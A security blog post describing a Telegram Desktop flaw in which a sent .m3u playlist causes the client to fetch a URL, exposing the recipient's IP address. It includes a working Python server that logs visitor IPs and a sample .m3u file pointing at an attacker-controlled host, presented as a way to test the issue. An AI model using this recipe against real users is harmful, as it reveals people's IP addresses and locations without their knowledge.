logo
Cyber Security

Telegram Desktop .m3u File Vulnerability: How Hackers Exposes Your IP Address with a single file

Najas Nazar - Cyfotok
Thumbnail

Telegram Desktop .m3u File Vulnerability: How Hackers Exposes Your IP Address with a single file

Introduction

Telegram is one of the most popular messaging platforms, known for its security features and privacy focus. However, a recently discovered vulnerability in Telegram Desktop for Windows shows that sending an .m3u file can expose a user’s IP address without their knowledge. Unlike .m3u8 files, which trigger a security warning, .m3u files do not prompt any alerts, leading to potential privacy concerns.

Understanding the Vulnerability

An .m3u file is a playlist format that contains URLs pointing to media files. When Telegram processes an .m3u file, it may automatically fetch the URLs listed in it, making HTTP requests to external servers. If an attacker controls the server, they can log the IP address of the user making the request.

  • Telegram Desktop does not warn users when processing .m3u files.

  • .m3u files can contain URLs pointing to an attacker-controlled server.

  • When Telegram fetches the URL, the user's IP address is exposed to the attacker.

How the Vulnerability Works

What Happens When an .m3u File is Sent?

  1. A user sends an .m3u file via Telegram Desktop.
  2. The recipient opens the file on their Telegram Desktop application.
  3. Telegram automatically processes the file and fetches the listed media URL.
  4. If the URL points to an attacker-controlled server, the recipient’s IP address is logged without their knowledge.

Steps to Understand and Test the Vulnerability

1. Set Up a Server to Log IP Addresses

To log incoming HTTP requests, we need a simple web server.

Option 1: Use a Python HTTP Server

import http.server
import socketserver

PORT = 8080

class RequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        client_ip = self.client_address[0]
        print(f"Request from IP: {client_ip}")
        with open("ip_log.txt", "a") as f:
            f.write(f"IP: {client_ip}\n")
        self.send_response(200)
        self.send_header("Content-type", "text/plain")
        self.end_headers()
        self.wfile.write(b"Hello, this is a test response!")

with socketserver.TCPServer(("", PORT), RequestHandler) as httpd:
    print(f"Server running on port {PORT}")
    httpd.serve_forever()

Run this script on a machine with a public IP or use a service like ngrok to expose it online.

Option 2: Use a Cloud Server

  • Deploy a simple web server on a VPS (e.g., AWS, DigitalOcean, Linode).
  • Configure the server to log incoming requests.

2. Create an .m3u File

Create a file named test.m3u with the following content:

#EXTM3U
#EXTINF:-1,Test Stream
http://<your-server-ip-or-ngrok-url>:8080/test

Replace <your-server-ip-or-ngrok-url> with your actual server URL.

Back to Posts